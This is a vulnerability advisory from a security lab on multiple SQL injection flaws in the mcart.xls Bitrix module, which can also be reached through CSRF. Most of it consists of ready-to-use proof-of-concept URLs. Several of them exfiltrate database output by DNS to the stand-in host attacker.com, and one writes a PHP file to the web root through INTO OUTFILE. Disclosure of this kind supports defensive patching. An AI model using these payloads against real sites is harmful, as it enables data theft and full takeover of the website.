Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module

High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website.

All discovered vulnerabilities require that the attacker is authorized against the website and has access to vulnerable module. However the vulnerabilities can be also exploited via CSRF vector, since the web application does not check origin of received requests. This means, that a remote anonymous attacker can create a page with CSRF exploit, trick victim to visit this page and execute arbitrary SQL queries in database of vulnerable website.

1. Input passed via the “xls_profile” HTTP GET parameter to “/bitrix/admin/mcart_xls_import.php” script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for version() (or any other sensitive output from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):

http://[host]/bitrix/admin/mcart_xls_import.php?del_prof_real=1&xls_profile= %27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version( )),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(10 1),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))±-+

2. Input passed via the “xls_profile” HTTP GET parameter to “/bitrix/admin/mcart_xls_import.php” script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

A simple exploit below will write “<?phpinfo()?>” string into “/var/www/file.php” file:

http://[host]/bitrix/admin/mcart_xls_import.php?xls_profile=%27%20UNION%20SE LECT%201,%27%3C?%20phpinfo%28%29;%20?%3E%27,3,4,5,6,7,8,9,0%20INTO%20OUTFILE %20%27/var/www/file.php%27%20–%202

Successful exploitation requires that the file “/var/www/file.php” is writable by MySQL system account.

3. Input passed via the “xls_iblock_id”, “xls_iblock_section_id”, “firstRow”, “titleRow”, “firstColumn”, “highestColumn”, “sku_iblock_id” and “xls_iblock_section_id_new” HTTP GET parameters to “/bitrix/admin/mcart_xls_import_step_2.php” script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

Below is a list of exploits for each vulnerable parameter. The exploits are based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for version() (or any other sensitive output from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):

“xls_iblock_id”:

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(CONCAT(CH AR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),C HAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),C HAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)) ))%29±-+&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&first Column=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ iblock_section_id_new=0
“xls_iblock_section_id”
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0,0,(select%20load_file (CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),C HAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),C HAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97), CHAR(114))))%29±-+&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highe stColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section _id_new=0

“firstRow”:

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0,0,0,0,0,0,0,0,0(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20v ersion()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107), CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102) ,CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29±-+&titleRow=0&firstC olumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_i block_section_id_new=0

“titleRow”:

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(se lect%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CH AR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),C HAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29±-+&firstColu mn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblo ck_section_id_new=0

“firstColumn”:

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0%27,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(9 2),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR( 97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR( 109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%2 9±-+&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ibl ock_section_id_new=0

“highestColumn”:

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0%27,0,0,0,0,(select%20load_file (CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),C HAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),C HAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97), CHAR(114))))%29±-+&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ibloc k_section_id_new=0

“sku_iblock_id”:

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1, 0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR (46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR (114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHA R(111),CHAR(98),CHAR(97),CHAR(114))))%29±-+&cml2_link_code=1&xls_iblock_sec tion_id_new=0

“xls_iblock_section_id_new”:

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1& cml2_link_code=1&xls_iblock_section_id_new=0,(select%20load_file(CONCAT(CHAR (92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHA R(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHA R(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) %29±-+